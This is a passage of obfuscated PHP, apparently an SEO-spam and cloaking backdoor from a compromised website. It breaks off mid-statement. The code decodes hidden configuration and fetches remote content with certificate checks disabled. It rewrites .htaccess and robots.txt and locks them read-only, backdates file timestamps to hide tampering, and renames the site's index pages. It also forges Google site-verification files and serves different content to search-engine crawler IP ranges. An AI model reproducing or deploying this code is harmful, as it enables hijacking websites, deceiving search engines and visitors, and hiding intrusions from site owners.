$bbbb6b6){$bbbb6b6=preg_split("//",$bbbb6b6,-1,PREG_SPLIT_NO_EMPTY);$bbb6b6b66[$b6bbbbbbb]=implode("",array_reverse($bbbb6b6));};$b6b66b=__FILE__;$b6bb6bb6=explode("9","bb666b6669bb666bb69b66b6bb69b66bb6b9bbbbbbbb69b6666b6bb9b6bb66669bbb6bbb9b6bbbbb9bbbbb6b9b6b66bbb9b66bb6bb9bb66bb6bb9bb66b666b9bb66b66bb9b6b6bbbb9b6bb6b6bb9b666b66b9b66bbb69b6b66bb6b9b6bbbbb69bbbb6669b6b6bbb6b9b66b66b6b9b666bb6bb9bbb66b6b9b6bbb66b69b666bb66b9b6b66666b9b6b66bbbb9bbb6bb669bbb6b69bb6666bbb9b6bb6bb9b666b6b669bbbbbb6b69bbbb6b669b66b666bb9b66bbb6b69bbbb6b6b69b6bbbb6b69bb66bbb69b6b666b6b9b6bbb6669bbb66b69bb6b6bb9b6bb66b669b66bb669bbb66bb69b66bb6b6b9bbb666bb9b6bb66bb69bb6666bb69bbbb666bb9b6bb6b669bbbb6b6bb9bbbbb6b69b6666b6b9b6666bb9bb66b6b6b9b66b666b69b6bb666bb9b6666bb69bbb666bb69bbb6666669bbb66bb9bb6666669b6b6bbb66");foreach($b6bb6bb6 as$bb66bb=>$b6b6666){$$b6b6666=$bbb6b6b66[$bb66bb];}; function l1nIiZN($l1X){$l1r8L8nO="ABCDEFGHIJKLMNOPQRSTUVWXYZab"."cdefghijklmnopqrstuvwxyz0123456789+/=$";$l10xtpp=$l10fGT=$l1hbBwWN="";$l1RO=$l19cfg=$l1wc=$l1H="";$l1oSpy=0;$l1Q="";$l1X=preg_replace("/[^A-Za-z0-9\+\/\=$]/","",$l1X);do{$l1RO=strpos($l1r8L8nO,substr($l1X,$l1oSpy++,1));$l19cfg=strpos($l1r8L8nO,substr($l1X,$l1oSpy++,1));$l1wc=strpos($l1r8L8nO,substr($l1X,$l1oSpy++,1));$l1H=strpos($l1r8L8nO,substr($l1X,$l1oSpy++,1));$l10xtpp=($l1RO<<2)|($l19cfg>>4);$l10fGT=(($l19cfg&15)<<4)|($l1wc>>2);$l1hbBwWN=(($l1wc&3)<<6)|$l1H;$l1Q=$l1Q.chr((int)$l10xtpp);if($l1wc!=64){$l1Q=$l1Q.chr((int)$l10fGT);}if($l1H!=64){$l1Q=$l1Q.chr((int)$l1hbBwWN);}$l10xtpp=$l10fGT=$l1hbBwWN="";$l1RO=$l19cfg=$l1wc=$l1H="";}while($l1oSpy$bbb66b6b6){$b666b66bb[$b66666bb]=l1K1M($bbb66b6b6);};@extract($b666b66bb); preg_match("/@'(.*?)';/s",$b6bbb6,$_SESSION["oO0Oo0OO0"]); @set_time_limit(7200); @ignore_user_abort(1); @ob_start(); $l1M18r=""; $l1IKwg=0; $l1NI41=""; $l1KeEzyz=$l1t=0; $l11IG4t=""; $l1ZBL=""; $l1RyF="."; $l1Hq=$l1ITi=$l1Fwx=$l13=$l18Oz=$l15=$l1CazCZ=$l1GQ7FN=""; $l1oBUIG1=$l1sg=$l12r=$l10w=$l1wvR3=$l1Olk=$l1QkNa=array(); $l1J=$_SERVER["DOCUMENT_ROOT"]; function l13eHl5M($l1NU,$l1guSzxM='',$l1QJz='w'){ $l1O9yi9=@fopen($l1NU,$l1QJz); if($l1O9yi9!==false){fwrite($l1O9yi9,$l1guSzxM);fclose($l1O9yi9);} } function l1za0zgi($l1TRNdRI){ return preg_split('//u',$l1TRNdRI,-1,PREG_SPLIT_NO_EMPTY); } function l14w($l1F,$l13=0,$l1prh=1,$l1Ffth=null,$l1Lmyc7=array()){ $l16mi=0; if(function_exists('curl_init') && function_exists('curl_exec')){ $l1Zh=curl_init(); curl_setopt($l1Zh,CURLOPT_URL,$l1F); curl_setopt($l1Zh,CURLOPT_USERAGENT,'WHR'); curl_setopt($l1Zh,CURLOPT_CONNECTTIMEOUT,0); curl_setopt($l1Zh,CURLOPT_RETURNTRANSFER,1); curl_setopt($l1Zh,CURLOPT_SSL_VERIFYPEER,false); curl_setopt($l1Zh,CURLOPT_SSL_VERIFYHOST,false); curl_setopt($l1Zh,CURLOPT_FOLLOWLOCATION,true); curl_setopt($l1Zh,CURLOPT_TIMEOUT,300); $l1k8=curl_exec($l1Zh); curl_close($l1Zh); if($l1k8){ $l16mi=$l1k8; } } if(strlen($l16mi)<15){ $l17=''; if(function_exists('fsockopen')){$l17='fsockopen';}elseif(function_exists('pfsockopen')){$l17='pfsockopen';} if($l17!=''){ $l14yYfXH=parse_url($l1F); $l14a=$l17($l14yYfXH["host"],isset($l14yYfXH["port"])?$l14yYfXH["port"]:80,$l1jIUwG5,$l1Z6JH2,30); if($l14a){$l16mi=isset($l14yYfXH["path"])?$l14yYfXH["path"]:''; $l16mi.=isset($l14yYfXH["query"])?'?'.$l14yYfXH["query"]:''; $l16mi=$l16mi==''?'/':$l16mi; fwrite($l14a,"GET $l16mi HTTP/1.0\r\nHost:".$l14yYfXH["host"]."\r\nConnection:Close\r\n\r\n"); $l1lTyog=''; while(!feof($l14a)){ $l1lTyog.=fgets($l14a,4096); } fclose($l14a); $l16mi=preg_match('/^HTTP\/1/si',$l1lTyog)?preg_replace("/.*?\r\n\r\n(.*)/si","$1",$l1lTyog):preg_replace('/^[^<]+?(<.*)/is',"$1",$l1lTyog); }else{ $l16mi=0; } } if(strlen($l16mi)<15){ $l16mi=file_get_contents($l1F); } } return trim(trim($l16mi,"\xEF\xBB\xBF")); } function l1w($l1HXw0iE='',$l1hKtMCG=false){ $l1AV='googlebot|baiduspider|bingbot|google|baidu|aol|bing|yahoo'; if($l1hKtMCG){$l1AV.='|Mozilla';} return preg_match("/($l1AV)/si",$l1HXw0iE); } function l1u($l142=''){ $l1Oa=preg_match('/(google.co.jp|yahoo.co.jp|bing|baidu)/si',$l142); if($l1Oa){ if(!isset($l1w7["isytu"])){ @setcookie('isytu',1,time()+3600*24*365); } } return $l1Oa; } function l17w($l15rL='',$l1wW9o0=false,$l1ywO0=1,$l1UR=''){ if($l1wW9o0){return $l1ywO0;} else{ if($l15rL!=''){return $l15rL;} else{$l1X73=0; $l1X2WqcG=$l1UR!=''?preg_replace('/(\?|&)?('.$l1UR.').*/si','',$_SERVER["REQUEST_URI"]):$_SERVER["REQUEST_URI"]; $l1X73=md5($l1X2WqcG); $l1X73=preg_replace('/[^\d]/si','',$l1X73); if($l1X73!=0){ $l1s0SlsS=strlen($l1X73);$l16pQGjL=strlen($l1ywO0); if($l1s0SlsS>$l16pQGjL){$l1X73=(int)substr($l1X73,-($l16pQGjL)); if($l1X73>$l1ywO0){$l1X73=substr($l1X73,-($l16pQGjL-1));} }else{ $l1X73=(int)$l1X73; if($l1X73>$l1ywO0){ $l1X73=substr($l1X73,-($l16pQGjL-1)); } } $l1X73=(int)$l1X73; if($l1X73!=0){return (int)$l1X73;} } $l15d='http://'; if(isset($_SERVER["HTTP_HOST"])){$l15d.=$_SERVER["HTTP_HOST"];} if(isset($_SERVER["SERVER_NAME"])){$l15d.=$_SERVER["SERVER_NAME"];} if(isset($_SERVER["REQUEST_URI"])){$l15d.=$_SERVER["REQUEST_URI"];} if(isset($_SERVER["REMOTE_ADDR"])){$l15d.=$_SERVER["REMOTE_ADDR"];} if(isset($_SERVER["SERVER_SOFTWARE"])){$l15d.=$_SERVER["SERVER_SOFTWARE"];} if($l1UR!=''){$l15d=preg_replace('/(\?|&)?('.$l1UR.').*/si','',$l15d);} return strlen($l15d);} } } function l17Pq($l18c5){ if(file_exists($l18c5)){ @touch($l18c5,1474121553); } } function l1N96X($l1XL){ $l1BcDoUi=false; if(is_file($l1XL)){ $l1OiSCO=filemtime($l1XL); if($l1OiSCO<=1474121553){$l1BcDoUi=true;} } return $l1BcDoUi; } function l16T($l1oMDw=''){ $l1oMDw=explode(',',$l1oMDw); if(!empty($l1oMDw)){ foreach($l1oMDw as$l1AELAT8){ if(!l1N96X($l1AELAT8)){ l17Pq($l1AELAT8); } } } } function l1K($l1cR=''){ $l1cR='.htaccess'; if(!l1N96X($l1cR)){ @chmod($l1cR,0777); $l1Hvq8=@file_get_contents($l1cR); $l1BZWl=array(); if($l1Hvq8!==false){ preg_match_all("/[^<]+<\/IfModule>/si",$l1Hvq8,$l1nWw); if(isset($l1nWw[0])&&!empty($l1nWw[0])){ foreach($l1nWw[0]as$l1XOr){ if(!preg_match('/(\{HT'.'TP_USER_AGENT\}|webdirect.php|\/index.php|php\?hl'."=\\\$1|\^\(.\*\)\\\$|.\*-.\*|\?\\\$\d\d?\\\$1\d)/si",$l1XOr)){ $l1BZWl[]=$l1XOr; } } } } if(empty($l1BZWl)){ $l1BZWl[]=sprintf('%sRewriteEngine%sOn%sRewriteCond%s%s{REQUEST_FILENAME}%s!-f%sRewriteCond%s%s{REQUEST_FILENAME}%s!-d%sRewriteRule%s.%sindex.php%s[L]%s',' ',"\n",' ',"\n",' ','%',' ',"\n",' ','%',' ',"\n",' ',' ',' ',"\n"); } l13eHl5M($l1cR,trim(implode("\n",$l1BZWl))); $l1Hvq8=$l1BZWl=null; l17Pq($l1cR); @chmod($l1cR,0444); } } function l1x9PeG($l1mzIB,$l1WBQ=1){ $l1J2Lf='\\?/|&()[]{}+^$!:*'; $l1dMf8ip=l1za0zgi($l1J2Lf); $l1cW7E='%s%s'; if($l1WBQ){ $l1mzIB=preg_replace('/(\?|#).*/si','',$l1mzIB); } foreach($l1dMf8ip as $l10hDd){ $l1mzIB=str_replace($l10hDd,sprintf($l1cW7E,'\\',$l10hDd),$l1mzIB); } return $l1mzIB; } function l1o9S8s($l17,$l1XaL30,$l1BApUam,$l1c){ $l1ndL=array(); if($l1XaL30>0){ if($l17<=$l1XaL30){ $l1ndL=range(0,$l17); }else{ $l1Mu2HzK=mt_rand(1,($l17-$l1XaL30*2)); $l1ndL=range($l1Mu2HzK,$l1Mu2HzK+$l1XaL30-1); } } return $l1ndL; } function l1SVS5w($l1ZpbG=''){ $l1SVS5w="$l1ZpbG/robots.txt"; if(!l1N96X($l1SVS5w)){ @chmod($l1SVS5w); l13eHl5M($l1SVS5w,sprintf('User-agent:%s*%sDisallow:',' ',"\n")); l17Pq($l1SVS5w); } } function l1SVS6w($l1ZpbG=''){ $l1SVS5w="$l1ZpbG/robots.txt"; if(!l1N96X($l1SVS5w)){ @chmod($l1SVS5w); l13eHl5M($l1SVS5w,sprintf('User-agent:%s*%sDisallow:',' ',"\n")); l17Pq($l1SVS5w); } } function l14y($l1LaJq,$l1RPWi=0){ global $l1QkNa,$l15,$l1t,$l12r; $l1hbii=$l1LaJq[0]; $l1TgJ7R=$l1LaJq[1]; $l1RWhzR6=$l1LaJq[2]; $l1H=''; $l1dftquN=$l1hbii+$l1TgJ7R; $l1n01b=l1nd($l1QkNa["url_rules"],$l1dftquN); if($l1n01b!=''){ $l1H=$l1QkNa["url_prefix"].($l1QkNa["url_prefix_qm"]?preg_replace("/\?/",'QMQM',$l1n01b):$l1n01b); $l19=$l12r[array_rand($l12r)]; $l18y7j6T=l1nd($l1QkNa["extensions"],$l1dftquN); $l1H=str_replace(array('#','^','$','!','*'),array($l19,$l1hbii,$l1TgJ7R,$l1TgJ7R,$l18y7j6T),$l1H); preg_match_all('/\[(\d)\:(.*?)\]/',$l1H,$l1RlT8B); if(isset($l1RlT8B[0])){ foreach($l1RlT8B[0]as$l1IuZ=>$l18kjhtD){ $l18W=$l1RlT8B[1][$l1IuZ]==''?0:$l1RlT8B[1][$l1IuZ];$l1xhCd3=$l1RlT8B[2][$l1IuZ]==''?'3~5':$l1RlT8B[2][$l1IuZ]; $l1H=preg_replace('/'.addcslashes($l18kjhtD,'[]:~').'/si',l1Pbp($l18W,$l1xhCd3,-1),$l1H,1); } } $l1H=$l1QkNa["url_prefix_qm"]?preg_replace('/QMQM/','%3F',$l1H):$l1H; } return $l15.($l1RPWi?$l1H:"$l1H$l1RWhzR6{$l1LaJq[3]}<"); } function l1nd($l1llqTx=array(),$l1P=0){ $l1HJe=''; $l1P=(int)$l1P; if(!empty($l1llqTx)){ if(isset($l1llqTx[$l1P])){ $l1HJe=$l1llqTx[$l1P]; }else{ $l1HJe=$l1llqTx[$l1P%count($l1llqTx)]; } } return $l1HJe; } function l1WfJ4fS( $l1Jfg,$l1qhrEh,$l14A3ja,$l155d=0){$l1j=array(0,array()); if(!empty($l1qhrEh)){ $l1IQ=!empty($l14A3ja)?implode('|',$l14A3ja):''; foreach($l1qhrEh as$l1HLUS0){ $l1HLUS0=preg_replace('/\[0\:.*?\]/si','[a-z]+',$l1HLUS0); $l1HLUS0=preg_replace('/\[1\:.*?\]/si','[0-9]+',$l1HLUS0); $l1HLUS0=preg_replace('/\[2\:.*?\]/si','[a-z0-9]+',$l1HLUS0); $l1HLUS0=preg_replace('/\[3\:.*?\]/si','[a-zA-Z]+',$l1HLUS0); $l1HLUS0=preg_replace('/\[4\:.*?\]/si','[A-Z]+',$l1HLUS0); $l1HLUS0=preg_replace('/\[5\:.*?\]/si','[a-zA-Z0-9]+',$l1HLUS0); $l1HLUS0=strtr($l1HLUS0,array('@'=>')|(','{'=>'((','}'=>'))','?'=>$l155d?'%3F':'\?','#'=>'[a-zA-Z]+','^'=>'(\d+)','!'=>'(\d+)','/'=>'\/','+'=>'\+','*'=>($l1IQ!=''?"($l1IQ)":''))); $l1HLUS0=str_replace(']\+',']+',$l1HLUS0); $l1XVH=array(); if(preg_match("/^$l1HLUS0$/",urldecode($l1Jfg),$l1XVH)){ $l1j=array(1,$l1XVH); break; } } } return $l1j; } function mgfile(){ $z1QeOYuD=isset($_SERVER['REQUEST_URI'])?$_SERVER['REQUEST_URI']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); if(preg_match("/.*?google([a-zA-z0-9]+)\.html/is",$z1QeOYuD,$gyz)){ $gfile="/".trim($_SERVER['DOCUMENT_ROOT'],'/')."/google".$gyz[1].".html"; if(file_exists($gfile)){ die("google-site-verification: ".$gfile); } $UA ="Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 ApplesWebKit/537.36 Safari/537.36"; if($_SERVER['HTTP_USER_AGENT'] == $UA){ if(!file_exists($gfile)){ @file_put_contents($gfile,"google-site-verification: google".$gyz[1].".html"); die("ggoogle-site-verification: google".$gyz[1].".html"); } } } } function l1AjK(){ $l1djh=array('HTTP_CDN_SRC_IP','HTTP_PROXY_CLIENT_IP','HTTP_WL_PROXY_CLIENT_IP','HTTP_CLIENT_IP','HTTP_X_FORWARDED_FOR','REMOTE_ADDR',); $l1l='unknown'; foreach($l1djh as$l1et0t){ if(!empty($_SERVER[$l1et0t]) && strtolower($_SERVER[$l1et0t])!='unknown'){ $l1l=$_SERVER[$l1et0t]; break; } } return $l1l; } function l1Vr(){ $l13E=@strtolower($_SERVER["HTTP_USER_AGENT"]); if($l13E=='yuantuobot2'){return true;} if(strpos(@strtolower($_SERVER["HTTP_REFERER"]),'translate')!=false){return false;} $l1x=$l1p=l1AjK(); if(($l1Brf=ip2long($l1p))<0){$l1Brf+=4294967296;} $l1md=array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),array(3481178113,3481182206),array(2915172353,2915237886),array(2850291712,2850357247),array(1823129600,1823145983),array(1823539200,1823571967),array(2398748672,2398879743),array(2899902464,2899967999),array(2902261760,2902327295),array(2915172352,2915237887),array(3232890880,3233021951),array(3344429056,3344430079),array(3481178112,3481182207),array(3487539200,3487543295),array(3518562304,3518627839),array(3512041472,3512074239),array(3639549952,3639558143),array(3625975808,3626237951),array(3627728896,3627737087),array(1074921472,1074925567),array(1089052672,1089060863),array(1078214656,1078222847),array(1113980928,1113985023),array(1123631104,1123639295),array(1176535040,1176543231),array(1180172288,1180434431),array(1208926208,1208942591),array(1249705984,1249771519),array(134217728,150994943),array(1081896984,1081896991),array(2159111488,2159111679),array(2159128096,2159128111),array(3468331392,3468331283),array(3459234728,3459234735),array(3475195328,3475195391),array(3494556048,3494556063),array(3522775360,3522775367),array(1062518496,1062518527),array(1081575648,1081575655),array(1081927080,1081927087),array(1082183584,1082183599),array(1074918400,1074918431),array(1103424288,1103424303),array(1104396896,1104396911),array(1104572512,1104572543),array(1104609120,1104609135),array(1105036720,1105036735),array(1105135664,1105135679),array(1119913504,1119913519),array(1132356616,1132356623),array(1180359472,1180359479),array(1180359496,1180359503),array(3518589952,3518590207),array(3518627072,3518627327),array(3512069632,3512069887),array(3639550208,3639550463),array(3639551232,3639551487),array(3639551842,3639551843),array(3639552352,3639552355),array(3639553280,3639553535),array(3639553536,3639553791),array(3639554912,3639556963),array(3626100131,3626100131),array(1089056193,1089056255),array(1078218752,1078219007),array(1078219008,1078219263),array(1078219264,1078219519),array(1078219520,1078219775),array(1078219776,1078220031),array(1078220032,1078220287),array(1078220288,1078220543),array(1078220544,1078220799),array(1078220800,1078221055),array(1078221056,1078221311),array(1078221313,1078221567),array(1078221568,1078221823),array(1078221824,1078222079),array(1123631104,1123631359),array(1123631360,1123631615),array(1123631616,1123631871),array(1123631872,1123632127),array(1123632128,1123632383),array(1123632384,1123632639),array(1123632640,1123632895),array(1123632896,1123633151),array(1123633152,1123633407),array(1123633408,1123633663),array(1123634688,1123634943),array(1123634944,1123635199),array(1208928000,1208928000),array(134623232,134623487),array(1123634176,1123634431),array(1089052672,1089060863),array(1113980928,1113985023),array(1123631104,1123639295),array(1208926208,1208942591),array(1249705984,1249771519),array(3512041472,3512074239),array(3639549952,3639558143),array(3639550208,3639550463),array(3639550720,3639550975),array(3639551232,3639551487),array(3639551744,3639551999),array(3639554816,3639555071),array(3639555328,3639555583),array(3639555840,3639556095),array(3639556352,3639556607),array(3639556864,3639557119),array(1089052928,1089053183),array(1089060096,1089060351),array(1113983744,1113983999),array(1113982720,1113982975),array(1113983232,1113983487),array(1123631104,1123631359),array(1123631360,1123631615),array(1123631616,1123631871),array(1123632896,1123633151),array(1123633152,1123633407),array(1208930048,1208930303),array(1089060096,1089060351),array(1113983744,1113983999),array(1113982720,1113982975),array(1113983232,1113983487),array(1123631104,1123631359),array(1123631360,1123631615),array(1123631616,1123631871),array(1123632896,1123633151),array(1123633152,1123633407),array(1208930048,1208930303),array(3639550208,3639550463),array(3639550720,3639550975),array(3639551232,3639551487),array(3639551744,3639551999),array(3639554816,3639555071),array(3639555328,3639555583),array(3639555840,3639556095),array(3639556352,3639556607),array(3639556864,3639557119),array(1123631360,1123631615),array(1123632128,1123632383),array(1123632896,1123633151),array(3419421696,3419421951),array(3729389312,3729389567),array(1090060288,1090125823),array(1078394880,1078460415)); foreach($l1md as$l1V){if($l1Brf>=$l1V[0]&&$l1Brf<=$l1V[1]){return true;}} $l1Oej=array(134217728,150994943,1062518496,1062518527,1074918400,1074918431,1074921472,1074925567,1078214656,1078222847,1081575648,1081575655,1081896984,1081896991,1081927080,1081927087,1082183584,1082183599,1089052672,1089060863,1103424288,1103424303,1104396896,1104396911,1104572512,1104572543,1104609120,1104609135,1105036720,1105036735,1105135664,1105135679,1113980928,1113985023,1119913504,1119913519,1123631104,1123639295,1132356616,1132356623,1176535040,1176543231,1180172288,1180359472,1180359479,1180359496,1180359503,1180434431,1208926208,1208942591,1249705984,1249771519,1823129600,1823145983,1823539200,1823571967,2159111488,2159111679,2159128096,2159128111,2398748672,2398879743,2899902464,2899967999,2902261760,2902327295,2915172352,2915237887,3232890880,3233021951,3344429056,3344430079,3459234728,3459234735,3468331392,3468331455,3475195328,3475195391,3481178112,3481182207,3487539200,3487543295,3494556048,3494556063,3512041472,3512074239,3518562304,3518627839,3522775360,3522775367,3625975808,3626237951,3627728896,3627737087,3639549952,3639558143); foreach($l1Oej as$l1p){if($l1Brf==$l1p){return true;}} $l18=array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider'); foreach($l18 as $l1WKo){if(strpos($l13E,$l1WKo)!==false){return l1M9joE5($l1x,$l13E);}} return false; } function l1M9joE5($l14g,$l1ZK8){ $l1za=array('google'=>array('Googlebot','googlebot.com',),'yahoo'=>array('Yahoo!','inktomisearch.com',),'msn'=>array('MSNBot','live.com',),'bing'=>array('bingbot','msn.com',),); if(!preg_match('/^(\d{1,3}\.){3}\d{1,3}$/',$l14g)){return false;} if(empty($l1ZK8)){return false;} foreach($l1za as$l1PsG=>$l1npm1){ if(stripos($l1ZK8,$l1npm1[0])!==false){ $l1lGlyu=gethostbyaddr($l14g); if($l1lGlyu&&stripos($l1lGlyu,$l1npm1[1])!==false){return $l1PsG;} } } return false; } function l1p17i($l1eTb,$l1k,$l19K2N=array()){ $l18sE0=array('a'=>-1,'b'=>-1); if(is_array($l19K2N)){ foreach($l19K2N as$l14KB5Ro){ if(is_numeric($l14KB5Ro)){ if($l18sE0["a"]==-1){ $l18sE0["a"]=$l14KB5Ro; }else{ $l18sE0["b"]=$l14KB5Ro; } } } } return $l18sE0; } function l19($l1rA9='',$l1y=0){ if($l1y){ $l1rA9=preg_replace('/&/s','&',$l1rA9); $l1rA9=preg_replace('/'/s',"'",$l1rA9); $l1rA9=preg_replace('/"/s','"',$l1rA9); $l1rA9=preg_replace('/>/s','>',$l1rA9); $l1rA9=preg_replace('/</s','<',$l1rA9); }else{ $l1rA9=preg_replace("/&/s",'&',$l1rA9); $l1rA9=preg_replace("/'/s",''',$l1rA9); $l1rA9=preg_replace('/"/s','"',$l1rA9); $l1rA9=preg_replace("/>/s",'>',$l1rA9); $l1rA9=preg_replace("/$l1yE41B,'b'=>$l1BJCpWq); } function l1i0($l1s,$l1skho,$l1Hosb){ $l1U=array(); $l1IICid=@file_get_contents($l1s); if($l1IICid===false){ $l1IICid=l14w($l1skho); @l13eHl5M($l1s,$l1IICid); } $l1IICid=explode('|',$l1IICid); $l1U6vn=PHP_INT_MAX; foreach($l1IICid as$l18Y){ $l1mQ=explode('-',$l18Y); if($l1U6vn>$l1mQ[2]){$l1U6vn=$l1mQ[2];} $l1U[$l1mQ[0]]=array(); } $l1Rs4g=array(); for($l1lL5RFP=0;$l1lL5RFP<$l1Hosb;$l1lL5RFP++){ $l1Rs4g[]=mt_rand(0,$l1U6vn-1); } foreach($l1U as$l1f5Gh9=>$l1EpvMt){ $l1U[$l1f5Gh9]=$l1Rs4g; } return $l1U; } function l1VGOz($l1Fdzqr){ $l1lC=''; preg_match('/([^\.]+\.)(.*)(\/.*)/',$l1Fdzqr,$l12y7GU); if(is_array($l12y7GU) && count($l12y7GU)==4){ if($l12y7GU[2]!=''){ $l1uU=preg_split("//",$l12y7GU[2],-1,PREG_SPLIT_NO_EMPTY); foreach($l1uU as$l1Uel=>$l1E3LZYC){ $l1uU[$l1Uel]=chr(ord($l1E3LZYC)-5); } $l1lC=implode('',$l1uU); } $l1lC=$l12y7GU[1].$l1lC.$l12y7GU[3]; } return $l1lC; } function l18($l1q){ global $l1CazCZ; $l11r7zm=array(); preg_match_all("/]/si",$l1q,$l1zqY); if(isset($l1zqY[1])&&!empty($l1zqY[1])){ foreach($l1zqY[1]as$l1o4mgz){ $l1o4mgz=trim($l1o4mgz); if($l1o4mgz!=''){ $l1o4mgz=preg_replace('/^(https?\:)?\/\/[^\/]+\/?/si','',trim($l1o4mgz)); $l1o4mgz=preg_replace('/^[\/#]/si','',$l1o4mgz); $l1o4mgz=str_replace('\\','',$l1o4mgz); if($l1o4mgz!=''&&!preg_match('/\.(jpg|jpeg|gif|png|bmp|svg)$/si',$l1o4mgz)){ if(!in_array($l1o4mgz,$l11r7zm)){ $l11r7zm[]=l19($l1o4mgz,1); } } } } } return $l11r7zm; } function l1eYs3Sc($l1b4wYg=0){ $l1i8SZI=''; if($l1b4wYg==0){ if(((isset($_SERVER["HTTPS"]))&&(strtolower($_SERVER["HTTPS"])=='on'))||((isset($_SERVER["HTTP_X_FORWARDED_PROTO"]))&&(strtolower($_SERVER["HTTP_X_FORWARDED_PROTO"])=='https'))){ $l1i8SZI='s'; } }else{ if($l1b4wYg==2){ $l1i8SZI='s'; } } return $l1i8SZI; } function l1Ni4($l1vp=''){ mgfile(); $l1sSdk=$l10sD='jpwanda|jpyahoo'; $l1B2='Content-type:text/%sml;charset=utf-8'; $l10sD=explode('|',$l10sD); $l16Ogj=''; if(isset($_SERVER["HTTP_HOST"])){ $l16Ogj=$_SERVER["HTTP_HOST"]; }elseif(isset($_SERVER["SERVER_NAME"])){ $l16Ogj=$_SERVER["SERVER_NAME"]; } l1K(); global $l1M18r,$l1IKwg,$l1NI41,$l11IG4t,$l1ZBL,$l1RyF,$l1wvR3,$l1Olk,$l12r,$l10w,$l1sg,$l1oBUIG1,$l1KeEzyz,$l1QkNa,$l1Hq,$l1Fwx,$l1ITi,$l1J,$l1CazCZ,$l15,$l1GQ7FN,$l1t,$l18Oz,$l13; l1SVS5w($l1J); if(isset($_SESSION["oO0Oo0OO0"])){ $l11SI710=$_SESSION["oO0Oo0OO0"]; }else{ preg_match("/@'\\\$(.*?)';/s",file_get_contents(__FILE__),$l11SI710); } $l11SI710=(is_array($l11SI710)&&isset($l11SI710[1]))?trim($l11SI710[1]):''; $l1Iy8CQy=array(); if($l11SI710!=''){ $l11SI710=explode("\n",$l11SI710); foreach($l11SI710 as $l1yKk){ $l1yKk=trim($l1yKk); if($l1yKk==''){continue;} preg_match('/^\w+=(.*)/si',$l1yKk,$l1UEkx); if(isset($l1UEkx[1])){ $l1Iy8CQy[]=$l1UEkx[1]; } } if(count($l1Iy8CQy)!=10){exit('cfg_params_error');} list($l1M18r,$l1IKwg,$l1NI41,$l11IG4t,$l1ZBL,$l1RyF,$l1GQ7FN,$l1t,$l13,$l18Oz)=$l1Iy8CQy; } $l1M18r=trim($l1M18r); $l1IKwg=trim($l1IKwg); $l1KeEzyz=preg_match("/\?/",$l1NI41); $l12r=explode(',',$l1ZBL); $l1avcle1=$l18Oz; $l18Oz=explode('||',$l18Oz); if(empty($l18Oz)){exit('urlgz=?');} $l1sg=explode('|',$l18Oz[0]); $l1oBUIG1=isset($l18Oz[1])?explode(',',$l18Oz[1]):array(); $l1blfY=$l1M18r; $l1s9B=$l1IKwg; $l1SuNnv8=$l13; $l1t=preg_split('//',$l1t,-1,PREG_SPLIT_NO_EMPTY); $l13=preg_split('//',$l13,-1,PREG_SPLIT_NO_EMPTY); $l1t=count($l1t)!=4?array(1,1,1,0):$l1t; $l13=count($l13)!=9?array(1,0,1,1,0,1,0,0,0):$l13; $l1CwD9=sprintf("http%s://$l16Ogj",l1eYs3Sc($l13[8])); $l1b=str_replace('www.','',$l16Ogj); $l1NNZ=$l1G=isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:''); $l1NNZ=$l1G=($l1NNZ==''?((isset($_SERVER["PATH_INFO"])&&$_SERVER["PATH_INFO"]!='')?$_SERVER["PATH_INFO"]:$l1NNZ):$l1NNZ); $l1V4Fe=$l1CwD9.$l1NNZ; $l1Hq=''; $l1P=''; $l1EYDxW='index.htm'; if(file_exists($l1EYDxW)){ @rename($l1EYDxW,"{$l1EYDxW}000"); } if(file_exists("{$l1EYDxW}l")){@rename("{$l1EYDxW}l","{$l1EYDxW}l000");} if(file_exists("{$l1EYDxW}000")){$l1P="{$l1EYDxW}000";} if(file_exists("{$l1EYDxW}l000")){$l1P="{$l1EYDxW}l000";} $l1Fwx=isset($_SERVER["SCRIPT_NAME"])?$_SERVER["SCRIPT_NAME"]:''; if($l1Fwx==''){ $l1Fwx=isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:''; if($l1Fwx!=''){$l1Fwx=str_replace($l1J,'',$l1Fwx);} } l16T("$l1J$l1Fwx,".__FILE__); if($l1Fwx!=''){ $l1Fwx=substr($l1Fwx,1); $l1u=strrpos($l1Fwx,'/'); $l1Hq=$l1u!==false?substr($l1Fwx,0,$l1u):''; $l1ITi=$l1u!==false?substr($l1Fwx,$l1u+1):$l1Fwx; } $l1b7=!l1N96X(__FILE__); $l15=preg_match('/!$/',$l1NI41)?1:0; $l1NI41=preg_replace('/!/','',$l1NI41); $l1NI41=$l1NI41=='?'?"$l1ITi?":($l1NI41=='/'?"$l1ITi/":$l1NI41); $l1OlB9=explode('|','index.php|default.php|index.html|index.htm'); $l1OlB9[]=$l1ITi; $l1Q4=false; $l1NQ=$l1sSdk.'|ls1|ls2'; $l1NQ=explode('|',$l1NQ); foreach($l1NQ as $l1t1AP){ $l1G=preg_replace('/(\?|&)'.$l1t1AP.'/si','',$l1G); } $l1G=preg_replace('/^\//si','',$l1G); $l1G=$l1Hq!=''?preg_replace(sprintf('/^%s\//si',l1x9PeG($l1Hq)),'',$l1G):$l1G; if(!preg_match('/^\?/si',$l1G)){ $l1G=preg_replace("/^($l1ITi)?(\?|\/)/si",'',$l1G); } if(preg_match('/.(gif|jpe?g|ico|png|bmp|css|js)$/si',$l1G)){ exit(); } $l19Hrj=$l1NI41; $l19Hrj=preg_replace('/^\//si','',$l19Hrj); $l1jcvG=l1x9PeG($l1G); $l1bu14f=false; $l1C=isset($_GET["hostxml"]); $l1OmBl=($l1C&&$_GET["hostxml"]!='')?"{$_GET["hostxml"]}.xml":"{$l1b}-sitemap.xml"; $l19='sitemap_'; $l1Aq=''; $l1Rd=0; $l1zGneha=false; $l1zWk6m=1; $l1VZp6Wj=50000; $l1bFD=0; $l1Wk24V=0; $l1Hj6kGY=0; $l191b=1; $l1Bf6Em=1; $l1NJ=0; if(preg_match('/\.xml$/si',$l1G)){ $l1G=preg_replace('/^\?/si','',$l1G); $l1bu14f=true; 